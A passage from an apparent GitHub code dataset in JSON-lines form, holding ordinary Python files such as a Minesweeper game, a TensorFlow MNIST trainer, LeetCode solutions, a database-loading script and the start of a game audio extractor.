vectors\ny_pos = [0, 0]\nx_direct = [1, 0]\ny_direct = [1, -1]\n\n# Creating plot\nfig, ax = plt.subplots(figsize = (12, 7))\nax.quiver(x_pos, y_pos, x_direct, y_direct,\n\t\tscale = 5) #quiver gets 4 arguments: an origin, a direction. In this case a scale to match the axis scale\n\nax.axis([-1.5, 1.5, -1.5, 1.5])\n\n# show plot\nplt.show()\n","repo_name":"fra-mar/atmospheric_reentry_sim","sub_path":"tests/test_rotation/test_drawing_vectors.py","file_name":"test_drawing_vectors.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"358796922","text":"import heapq\n\n# using maxHeap\n\n\ndef KClosest(nums, x, k):\n maxHeap = []\n\n for i in range(len(nums)):\n heapq.heappush(maxHeap, ((-1) * abs(nums[i] - x), nums[i]))\n\n if len(maxHeap) > k:\n heapq.heappop(maxHeap)\n\n return [closest[1] for closest in maxHeap]\n\n\n# KClosest([5,6,7,9,10],7,3)\n# print(KClosest([5, 6, 7, 8, 9], 7, 3))\n","repo_name":"dikshap07/Algorithms-and-Data-Structures","sub_path":"src/KClosestElements.py","file_name":"KClosestElements.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17932515810","text":"from PIL import Image\r\nimport numpy as np\r\nimport cv2\r\n\r\n__author__ = 'yonatan'\r\n__project__ = 'video_base'\r\n\r\n\r\n#class image_converter(object):\r\n# def __init__(self):\r\n# pass\r\n\r\ndef array2jpegBuffer(image):\r\n img_str = cv2.imencode('.jpg', image)[1].tostring()\r\n return img_str\r\n\r\ndef array2PIL(arr, size):\r\n mode = 'RGBA'\r\n arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2])\r\n if len(arr[0]) == 3:\r\n arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]\r\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\r\n","repo_name":"LearnBits/RaspberryPI-webapp","sub_path":"learnbits/app/compvision/jpeg.py","file_name":"jpeg.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36660336020","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n dic = {None: None}\n curr = head\n while curr:\n dic[curr] = Node(x=curr.val)\n curr = curr.next\n \n curr = head\n while curr:\n dic[curr].next = dic[curr.next]\n dic[curr].random = dic[curr.random]\n curr = curr.next\n \n return dic[head]\n ","repo_name":"rhee519/LeetCode","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9371039223","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom random import randint\nfrom random import *\n\nN = 20 #게임판의 갯수를 20*20 의 크기로 만든다.\nbomb = 40 # 지뢰 갯수를 40개로 만든다.\n\ncnt = 0\nmap = [[0 for col in range(N+2)] for row in range(N+2)] # 맵을 만들자.\nbuttonchk = [[0 for col in range(N)] for row in range(N)]\nButton_X = [[0 for col in range(N)] for row in range(N)]\ndir = [[0,1],[0,-1],[1,0],[-1,0]]\nflag = bomb\n\nroot = Tk()\nroot.geometry(\"800x800\")\nvisit = [[0 for col in range(N)] for row in range(N)]\n\ndef clear():\n for i in range(N):\n for j in range(N):\n visit[i][j] = 0\n\n# 게임을 성공했을때 메시지를 띄우자\ndef Game_clear():\n messagebox.showinfo(\"Success!\",\"Congratulations! You have Successed This Game!\")\n\n# 왼쪽 버튼 클릭시 0의 위치이면 근처의 0의 위치를 모두 찾아서 셋팅하자.\ndef DFS(indx,indy):\n if(indx < 0 or indx >= N):\n return 0\n if(indy < 0 or indy >= N):\n return 0\n\n #print(indx,indy)\n if Button_X[indy][indx] == 1:\n return 0\n if visit[indy][indx] == 0:\n visit[indy][indx] = 1\n if map[indy][indx] == 0:\n Button_map[indy][indx].Show(indx,indy)\n buttonchk[indy][indx] = 1\n elif map[indy][indx] > 0:\n Button_map[indy][indx].Show(indx, indy)\n buttonchk[indy][indx] = 1\n return 0\n for i in range(4):\n DFS(indx+dir[i][0],indy+dir[i][1])\n\n else:\n return 0\n\n\"\"\"\ndef right(a,b):\n global flag\n cnt = 0\n print(\"right_clicked\")\n if(not Button_X[b][a] == 1 and buttonchk[b][a] == 0):\n if(flag > 0):\n print(flag)\n Button_map[b][a].Num_Button[\"bg\"] = \"red\" #버튼의 색상을 변경하려고 했는데 변경이 안되고 bg 에러가 발생\n Button_X[b][a] = 1\n flag -= 1\n if(flag == 0):\n for i in range(N):\n for j in range(N):\n if(buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n\n if cnt == 360:\n Game_clear()\n elif(Button_X[b][a] == 1):\n Button_map[b][a].Num_Button[\"bg\"] = \"white\"\n Button_X[b][a] = 0\n flag += 1\ndef right(event):\n global flag\n cnt = 0\n a=10\n b=10\n print(\"right_clicked\")\n print(type(Button_map[b][a].Num_Button))\n Button_map[b][a].Num_Button.configure(Button_map[b][a].Num_Button,bg=\"white\")\n if(not Button_X[b][a] == 1 and buttonchk[b][a] == 0):\n if(flag > 0):\n print(flag)\n Button_map[b][a].Num_Button[\"bg\"] = \"red\"\n Button_X[b][a] = 1\n flag -= 1\n if(flag == 0):\n for i in range(N):\n for j in range(N):\n if(buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n\n if cnt == 360:\n Game_clear()\n elif(Button_X[b][a] == 1):\n Button_map[b][a].Num_Button[\"bg\"] = \"white\"\n Button_X[b][a] = 0\n flag += 1\n\"\"\"\n\n# 버튼 클래스를 만들자.\nclass Button_:\n global map\n def __init__(self,x,y):\n self.tmpx = x\n self.tmpy = y\n self.Num_Button = ttk.Button(root,width = 4)\n self.Num_Button.grid(row=y, column=x,ipady = 5)\n self.Num_Button.bind('', self.Left)\n self.Num_Button.bind('', self.right)\n\n def Show(self,x1,y1):\n self.Num_Button.configure(text = str(map[y1][x1]))\n\n def Left(self,event):\n if(Button_X[self.tmpy][self.tmpx] == 0):\n if(map[self.tmpy][self.tmpx] == -1):\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n Game_over()\n elif(map[self.tmpy][self.tmpx] == 0):\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n buttonchk[self.tmpy][self.tmpx] = 1\n clear()\n DFS(self.tmpx,self.tmpy)\n else:\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n buttonchk[self.tmpy][self.tmpx] = 1\n #obj = Button_map[tmpy][tmpx]\n #print(\"clicked\")\n if (flag == 0):\n cnt = 0\n for i in range(N):\n for j in range(N):\n if (buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n if cnt == N*N-bomb:\n Game_clear()\n\n def right(self, event):\n global flag\n cnt = 0\n #print(\"right_clicked\")\n\n if (not Button_X[self.tmpy][self.tmpx] == 1 and buttonchk[self.tmpy][self.tmpx] == 0):\n if (flag > 0):\n #print(flag)\n Button_map[self.tmpy][self.tmpx].Num_Button.configure(text = \"X\")\n Button_X[self.tmpy][self.tmpx] = 1\n flag -= 1\n\n elif (Button_X[self.tmpy][self.tmpx] == 1 and buttonchk[self.tmpy][self.tmpx] == 0):\n #print(\"came\")\n Button_map[self.tmpy][self.tmpx].Num_Button.configure(text = \" \")\n Button_X[self.tmpy][self.tmpx] = 0\n flag += 1\n if (flag == 0):\n for i in range(N):\n for j in range(N):\n if (buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n if cnt == N*N-bomb:\n Game_clear()\n\n\nButton_map = [[Button_(0,0) for col in range(N)] for row in range(N)]\n\n# 게임실패시 메시지를 띄우자.\ndef Game_over():\n for i in range(N):\n for j in range(N):\n Button_map[i][j].Show(j,i)\n messagebox.showinfo(\"Game over...\", \"You Have Failed This Game... Try agian!\")\n #frame = ttk.Frame(root,width = 50,height = 50,text = \"Game over! Try again!\")\n #frame.pack()\n\n# 사방의 지뢰의 갯수를 세어서 리턴하자\ndef count(x,y):\n cnt_ = 0\n if(map[x + 1][y] == -1):\n cnt_ += 1\n if(map[x - 1][y] == -1):\n cnt_ += 1\n if(map[x][y + 1] == -1):\n cnt_ += 1\n if(map[x][y - 1] == -1):\n cnt_ += 1\n if(map[x + 1][y + 1] == -1):\n cnt_ += 1\n if(map[x + 1][y - 1] == -1):\n cnt_ += 1\n if(map[x - 1][y + 1] == -1):\n cnt_ += 1\n if(map[x - 1][y - 1] == -1):\n cnt_ += 1\n return cnt_\n\n# 맵을 0으로 초기화 하자\nfor i in range(N):\n for j in range(N):\n map[i][j] = 0\n\n\n\n# 지뢰 갯수만큼 랜덤위치에 지뢰를 -1로 셋팅하자.\nwhile(cnt < bomb):\n tmpx = randint(0,N-1)\n tmpy = randint(0,N-1)\n if(map[tmpy][tmpx] == -1):\n pass\n else:\n map[tmpy][tmpx] = -1\n cnt += 1\n\n# 지뢰 갯수를 세어서 맵에 셋팅하자.\nfor i in range(N):\n for j in range(N):\n if(map[i][j] == 0):\n map[i][j] = count(i,j)\n\n# 버튼을 20*20으로 만들어서 셋팅하자.\nfor i in range(N):\n for j in range(N):\n Button_map[i][j] = Button_(j,i)\n\nroot.mainloop()","repo_name":"hunter10/Python_Minesweeper_Test","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18790900048","text":"# coding=utf-8\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# MNIST数据集相关的常数\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\n# 配置神经网络的参数\nLAYER1_NODE = 500 # 隐藏层节点数\nBATCH_SIZE = 100 # 一个batch的训练数据个数\nLEARNING_RATE_BASE = 0.8 # 基础的学习率\nLEARNING_RATE_DECAY = 0.99 # 学习率的衰减率\nREGULARIZATION_RATE = 0.0001 # 描述模型复杂度的正则化项在损失函数中的���数\nTRAINING_STEPS = 30000 # 训练轮数\nMOVING_AVERAGE_DECAY = 0.99 # 滑动平均衰减率\n\n\n# 定义一个函数,计算神经网络的前向传播结果\ndef inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):\n # 当没有提供滑动平均类时,使用relu激活函数\n if avg_class is None:\n layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)\n return tf.matmul(layer1, weights2) + biases2\n\n else:\n # 使用avg_class.average函数计算变量的滑动平均值\n # 然后再计算相应的神经网络前向传播结果\n layer1 = tf.nn.relu(tf.matmul(input_tensor, avg_class.average(weights1)) + avg_class.average(biases1))\n return tf.matmul(layer1, avg_class.average(weights2)) + avg_class.average(biases2)\n\n\ndef train(mnist):\n x = tf.placeholder(tf.float32, [None, INPUT_NODE], name='x-input')\n y_ = tf.placeholder(tf.float32, [None, OUTPUT_NODE], name='y-input')\n\n # 生成隐藏层的参数\n weight1 = tf.Variable(tf.truncated_normal([INPUT_NODE, LAYER1_NODE]))\n biases1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))\n # 生成输出层的参数\n weight2 = tf.Variable(tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE]))\n biases2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))\n\n # 计算在当前参数下神经网络前向传播的结果\n y = inference(x, None, weight1, biases1, weight2, biases2)\n\n # 定义存储训练轮数的变量\n globa_step = tf.Variable(0, trainable=False)\n\n # 初始化滑动平均类\n variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, globa_step)\n # 在所有代表神经网络参数的变量上使用滑动平均\n variable_averages_op = variable_averages.apply(tf.trainable_variables())\n # 计算使用了滑动平均之后的前向传播结果\n average_y = inference(x, variable_averages, weight1, biases1, weight2, biases2)\n\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))\n\n # 计算当前batch中所有样例的交叉熵平均值\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n\n # ???????????????????????????????\n regularizer = tf.contrib.layers.l2_regularizer(REGULARIZATION_RATE)\n regularization = regularizer(weight1) + regularizer(weight2)\n loss = cross_entropy_mean + regularization\n\n learning_rate = tf.train.exponential_decay(LEARNING_RATE_BASE,\n globa_step,\n mnist.train.num_examples / BATCH_SIZE,\n LEARNING_RATE_DECAY)\n\n # 优化损失函数\n train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=globa_step)\n\n with tf.control_dependencies([train_step, variable_averages_op]):\n train_op = tf.no_op(name='train')\n\n correct_prediction = tf.equal(tf.argmax(average_y, 1), tf.argmax(y_, 1))\n\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n validate_feed = {x: mnist.validation.images,\n y_: mnist.validation.labels}\n\n test_feed = {x: mnist.test.images,\n y_: mnist.test.labels}\n\n for i in range(TRAINING_STEPS):\n if i % 1000 == 0:\n # 计算滑动平均模型在验证数据上的结果\n validate_acc = sess.run(accuracy, feed_dict=validate_feed) # ?????????????????\n print (\"after %d training steps , validation accuracy using average model is %g\" % (i, validate_acc))\n\n xs, ys = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_op, feed_dict={x: xs, y_: ys})\n\n # 训练结束后,在测试数据上检测神经网络模型的最终正确率\n test_acc = sess.run(accuracy, feed_dict=test_feed)\n print (\"after %d training steps , test accuracy using average model is %g\" % (TRAINING_STEPS, test_acc))\n\n\ndef main(argv=None):\n mnist = input_data.read_data_sets(\"/tmp/data\", one_hot=True)\n train(mnist)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"space0o0/tensorflow_learn","sub_path":"tensorflow_learn/date_510/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18869528820","text":"import operator\n\nclass Functions:\n #not used, this takes in 3 points and returns the a, b , c for a quad equation\n def QuadCreate(self, point1, point2, point3):\n x1 = point1[0]\n x2 = point2[0]\n x3 = point3[0]\n y1 = point1[1]\n y2 = point2[1]\n y3 = point3[1]\n a = \"\"\n b = \"\"\n c = \"\"\n x4 = \"\"\n x5 = \"\"\n x6 = \"\"\n x7 = \"\"\n y4 = \"\"\n y5 = \"\"\n\n y4 = y1-y2\n x4 = x1**2 - x2**2\n x5 = x1 - x2\n\n y5 = y1-y3\n x6 = x1**2 - x3**2\n x7 = x1 - x3\n\n tmpy4 = y4 * x7\n tmpx4 = x4 * x7\n tmpy5 = y5 * x5\n tmpx6 = x6 * x5\n if (tmpx4 - tmpx6) == 0:\n a = 1\n else:\n a = (tmpy4 - tmpy5)/(tmpx4 - tmpx6)\n\n if x7 == 0:\n b = 1\n else:\n b = (y5 - (x6*a))/x7\n\n c = y1 - (a*x1**2)- (b*x1)\n\n quadDic = {'a':a,'b':b,'c':c}\n return quadDic\n\n #reads in a file and returns points\n def ReadInFile(self, file_location):\n # file_location = r'C:\\Users\\Carrot\\Documents\\GitHub\\CS8803\\Resources\\Inputs\\test01.txt'\n\n with open(file_location , 'r') as content_file:\n content = content_file.read()\n\n content = content.split(\"\\n\")\n\n array = []\n\n for val in content:\n x = val.split(\",\")\n if x != ['']: # in case of empty line in test file\n array.append([int(x[0]),int(x[1])])\n return array\n\n #not used, calculates the rectangle of the area and adds in an additional\n #range. If the current_location is within that range returns true\n def WithinRangeSides(self, points, current_location, Rangex = 10, Rangey = 10):\n\n xMin = sorted(points)[0][0]\n xMax = sorted(points)[len(points)-1][0]\n points.sort(key=operator.itemgetter(1))\n yMin = points[0][1]\n yMax = points[len(points)-1][0]\n\n if xMin >= current_location - Rangex:\n return true\n if xMax <= current_location + Rangex:\n return true\n if yMin >= current_location[1]-Rangey:\n return true\n if yMax <= current_location[1]+Rangey:\n return true\n else:\n return false\n\n #not used, calculates the candle of the area and adds in an additional\n #range. If the current_location is within that range returns true\n def WithinRangeCandle(self, current_location, Range = 5):\n Radius = 5 + 34\n Candle_Center = (334, 178)\n\n if (current_location[0] - Candle_Center[0])**2 - (current_location[1] - Candle_Center[1])**2 <= Radius**2:\n return true\n else:\n return false\n","repo_name":"dstevens34/AI_Robotics_Project","sub_path":"Davids try/project/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2632468314","text":"import sys\nimport time\n\nfrom pathlib import Path\n\nfrom textadventure.input.inputhandling import CommandInput, FlagData\nfrom textadventure.saving.saving import SavePath\n\n\nfrom ninjagame.game import NinjaGame\nfrom textadventure.clientside.inputs import TextPrinterInputGetter, KeyboardInputGetter\nfrom textadventure.clientside.outputs import TextPrinterOutput, LocationTitleBarManager, ImmediateStreamOutput, \\\n OutputNotifierSender\nfrom textadventure.mainclass import ClientSideMain\nfrom textadventure.player import Player\nfrom textadventure.sending.message import Message, MessageType\nfrom textprint.colors import Color\nfrom textprint.inithelper import curses_init, std_init, curses_end, add_interrupt_handler, colorama_init\nfrom textadventure.handler import PlayerHandler\n\n\"\"\"\nThis file is an example game for my text adventure api using the ninjagame package\n\nThis file is not meant to be imported which is why it is not in any package right now\n\"\"\"\n\n\ndef create_fancy_player(stdscr, savable):\n from textprint.input import InputLineUpdater\n from textprint.section import Section\n from textprint.textprinter import TextPrinter\n\n curses_init()\n std_init(stdscr)\n colorama_init()\n\n input_section = Section(None, fill_up_left_over=False) # we want to allow it to go for as many lines it needs\n temp_section = Section(None, fill_up_left_over=False)\n print_section = Section(None, fake_line=(Color.BLUE >> \"~\"))\n title_section = Section(1)\n printer = TextPrinter([input_section, temp_section, print_section, title_section],\n print_from_top=False, stdscr=stdscr)\n printer.update_dimensions()\n # print_section.fake_line = Color.RED + Color.BOLD + \"|\" + (\" \" * (printer.dimensions[1] - 3)) + \"|\"\n\n updater = InputLineUpdater(printer, input_section.println(printer, \"\", flush=True), stdscr)\n player_input = TextPrinterInputGetter(updater)\n # input_manager = InputLineUpdaterManager(updater) # calls updater's update\n output = OutputNotifierSender(TextPrinterOutput(printer, print_section),\n lambda: temp_output.section.clear_lines(printer, flush=True))\n temp_output = TextPrinterOutput(printer, temp_section)\n player = Player(player_input, output, savable)\n\n def interrupt_handler():\n if updater.current_line().is_clear():\n temp_output.send_message(Message(Color.YELLOW >> \"Press CTRL+D to exit\", message_type=MessageType.IMMEDIATE))\n print_section.update_lines(printer, flush=True, force_reprint=True)\n else:\n updater.current_line().clear()\n\n add_interrupt_handler(interrupt_handler) # clear line when CTRL+C is pressed\n\n title_manager = LocationTitleBarManager(player, printer, title_section.println(printer, \"\"))\n\n return player, [player_input, output, temp_output, title_manager], lambda: curses_end()\n\n\ndef create_simple_player(savable):\n\n colorama_init()\n print()\n\n player_input = KeyboardInputGetter()\n player_input.start()\n\n output = ImmediateStreamOutput()\n\n player = Player(player_input, output, savable)\n\n return player, [output], lambda: None\n\n\ndef auto_flag_setup():\n command = CommandInput(CommandInput.join(sys.argv))\n options = {\n (\"rest\", \"r\"): 1,\n (\"simple\", \"windows\", \"dos\"): 0,\n (\"file\", \"f\", \"save\", \"path\"): 1,\n (\"clean\", \"no_load\"): 0,\n (\"user\", \"u\", \"player\", \"name\"): 1\n }\n flag_data = FlagData(command, options)\n\n rest = 0.001\n string_rest = flag_data.get_flag(\"rest\")\n if string_rest is not None:\n try:\n rest = float(string_rest)\n except ValueError:\n print(\"'{}' is not a valid number for rest.\".format(string_rest))\n sys.exit(1)\n if rest > 1:\n print(\"Rest cannot be greater than 1. Rest is the amount of time in seconds it waits to update.\")\n print(\"Making this greater than 1 makes the game unresponsive for too long of a period.\")\n sys.exit(1)\n\n string_file = flag_data.get_flag(\"file\")\n save_path = SavePath(Path(\"./save.dat.d\"))\n if string_file:\n save_path = SavePath(Path(string_file))\n\n is_clean = flag_data.get_flag(\"clean\") # should we load data?\n\n player_handler = PlayerHandler(save_path)\n player_savable = None\n\n result = player_handler.load_player_savables() # load these anyway\n\n player_name = flag_data.get_flag(\"user\")\n if player_name is not None:\n if is_clean:\n print(\"Error: Using --clean flag but also specifying a player to load.\")\n sys.exit(1)\n if not result[0]:\n print(result[1])\n sys.exit(1)\n player_savable = player_handler.get_player_savable(player_name)\n if player_savable is None:\n print(\"Unable to find player with name: '{}'\".format(player_name))\n sys.exit(1)\n else:\n print(\"Successfully loaded player: '{}'\".format(player_savable.name))\n\n if flag_data.get_flag(\"simple\"):\n # setup_simple(player_savable)\n information = create_simple_player(player_savable)\n else:\n try:\n import curses\n import pyparsing\n except ModuleNotFoundError:\n print(\"Unable to load curses or pyparsing library. Initializing simple instead of fancy\")\n # setup_simple(player_savable)\n information = create_simple_player(player_savable)\n else:\n # setup_fancy(player_savable)\n information = create_fancy_player(curses.initscr(), player_savable)\n\n player, custom_managers, end_function = information\n try:\n main_instance = ClientSideMain(NinjaGame(), custom_managers, player, save_path, rest=rest,\n player_handler=player_handler)\n main_instance.start()\n\n while True:\n main_instance.update()\n time.sleep(rest)\n finally:\n end_function()\n\n\ndef main():\n try:\n auto_flag_setup()\n except KeyboardInterrupt:\n print(\"Ended program with a keyboard interrupt\")\n sys.exit(0)\n finally:\n try:\n curses_end()\n except ImportError:\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"retrodaredevil/python-text-adventure-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4294562821","text":"class Solution:\n def minimumTotal(self, triangle):\n n = len(triangle)\n dp = triangle[-1]\n i = n-2\n\n while i >=0:\n j = 0\n while j <= len(triangle[i])-1:\n dp[j] = min(dp[j], dp[j+1]) + triangle[i][j]\n j += 1\n i -= 1\n return dp[0]\n","repo_name":"Ryuk17/LeetCode","sub_path":"Python/120. Triangle.py","file_name":"120. Triangle.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70100158967","text":"import os\nimport datetime\nimport math\nimport logging\nimport pandas as pd\n\nfrom modules.utils import Months\nfrom modules.utils import convert_to_numeric\n\nlogger = logging.getLogger('make_dataset')\n\n\nclass ClientDataError(Exception):\n '''\n Class used for throwing errors.\n '''\n\n\ndef populate_client_data(conn, parameters):\n '''\n Populates the SQL database with client's data.\n '''\n logger.info('. Populating data associated with generating assets')\n cursor = conn.cursor()\n _populate_hourly_prices(conn, cursor, parameters['Prices']['Hourly'])\n _populate_daily_prices(conn, cursor, parameters['Prices']['Daily'])\n _populate_generation(conn, cursor, parameters['Generation'])\n\n\ndef _populate_hourly_prices(conn, cursor, parameters):\n '''\n Populates hourly prices.\n '''\n f_in_name = parameters[0] # There is only one file\n\n # -- Power prices --\n\n logger.info('.. Reading \\'{}\\''.format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name)\n\n # Get product ID's\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'DAH\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_intradayprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. Processing power spot prices')\n\n list_of_records = list()\n cur_row = 0\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 4], datetime.date):\n # For each hour\n for h in range(0, 24):\n if not math.isnan(df.iat[cur_row, h + 6]):\n record = dict({\n \"datehour\": datetime.datetime(\n df.iat[cur_row, 4].year,\n df.iat[cur_row, 4].month,\n df.iat[cur_row, 4].day, h, 0),\n \"product_id\": product_id,\n \"price\": convert_to_numeric(df.iat[cur_row, h + 6])\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_intradayprices', conn,\n if_exists='append', index=False)\n conn.commit()\n\n\ndef _populate_daily_prices(conn, cursor, parameters):\n '''\n Populates daily prices.\n '''\n f_in_name = parameters[0] # There is only one file\n\n # -- Gas prices --\n\n logger.info('.. Reading gas prices from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name, sheet_name='Gas')\n\n # Get product ID's\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'Z1\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_dailyprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. Processing gas cash prices')\n\n list_of_records = list()\n cur_row = 3\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 3], datetime.date):\n try:\n record = dict({\n \"date\": df.iat[cur_row, 3],\n \"product_id\": product_id,\n \"bid\": convert_to_numeric(df.iat[cur_row, 4]),\n \"ask\": convert_to_numeric(df.iat[cur_row, 4]),\n \"bid_size\": 0,\n \"ask_size\": 0\n })\n list_of_records.append(record)\n except KeyError:\n logger.warning('** Warning: Does not recognize price type ' +\n '\\'{}\\'.'.format(df.iat[cur_row, 0]))\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_dailyprices', conn, if_exists='append', index=False)\n conn.commit()\n\n # -- Carbon prices --\n\n logger.info('.. Reading carbon prices from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name, sheet_name='Carbon')\n\n # Get the product ID\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'Carbon\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_dailyprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. Processing carbon prices')\n\n list_of_records = list()\n cur_row = 4\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 0], datetime.date):\n record = dict({\n \"date\": df.iat[cur_row, 0],\n \"product_id\": product_id,\n \"bid\": convert_to_numeric(df.iat[cur_row, 1]),\n \"ask\": convert_to_numeric(df.iat[cur_row, 1]),\n \"bid_size\": 0,\n \"ask_size\": 0\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_dailyprices', conn, if_exists='append', index=False)\n conn.commit()\n\n\ndef _populate_generation(conn, cursor, parameters):\n '''\n Populates historical generation.\n '''\n f_in_name = parameters[0] # There is only one file\n\n logger.info('.. Reading generation from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name)\n\n # Get generating plant ID\n cursor.execute(\n '''\n select id\n from tbl_ref_power_plants\n where name = \\'PP\\';\n ''')\n plant_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_generation ' +\n 'where plant_id = {};'.format(plant_id))\n conn.commit()\n\n logger.info('.. Processing generation for PP')\n\n list_of_records = list()\n cur_row = 3\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 1], datetime.datetime):\n record = dict({\n # Make sure we get a \"clean\" hour\n \"datehour\": datetime.datetime(\n df.iat[cur_row, 1].year,\n df.iat[cur_row, 1].month,\n df.iat[cur_row, 1].day,\n df.iat[cur_row, 1].hour),\n \"plant_id\": plant_id,\n \"generation\": convert_to_numeric(df.iat[cur_row, 2])\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_generation', conn, if_exists='append', index=False)\n conn.commit()\n","repo_name":"pyxidr/data-science-consulting-part1","sub_path":"src/python/modules/client_data.py","file_name":"client_data.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28907898586","text":"#\r\n# Biohazard 4 (GC) bio4midi.dat/hed sample extractor by Nisto\r\n# Last revision: Apr 28, 2015\r\n#\r\n# Developed under Python 3 and may or may not work with Python 2\r\n#\r\n\r\nimport os\r\nimport sys\r\nimport struct\r\n\r\nif sys.version_info[0] > 2:\r\n xrange = range\r\n\r\ndef samples_to_nibbles(samples):\r\n whole_frames = samples // 14\r\n remainder = samples % 14\r\n if remainder > 0:\r\n return (whole_frames * 16) + remainder + 2\r\n else:\r\n return whole_frames * 16\r\n\r\ndef samples_to_bytes(samples):\r\n nibbles = samples_to_nibbles(samples)\r\n return (nibbles // 2) + (nibbles % 2)\r\n\r\ndef extract_data(src, dst, size):\r\n read_max = 4096\r\n left = size\r\n while left:\r\n if read_max > left:\r\n read_max = left\r\n try:\r\n data = src.read(read_max)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Read error at 0x%08X\" % src.tell())\r\n if data == b\"\":\r\n break # EOF\r\n try:\r\n dst.write(data)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Write error at 0x%08X\" % dst.tell())\r\n left -= read_max\r\n\r\ndef dsp_header(meta):\r\n\r\n # 0x00 raw samples\r\n header = struct.pack(\">I\", 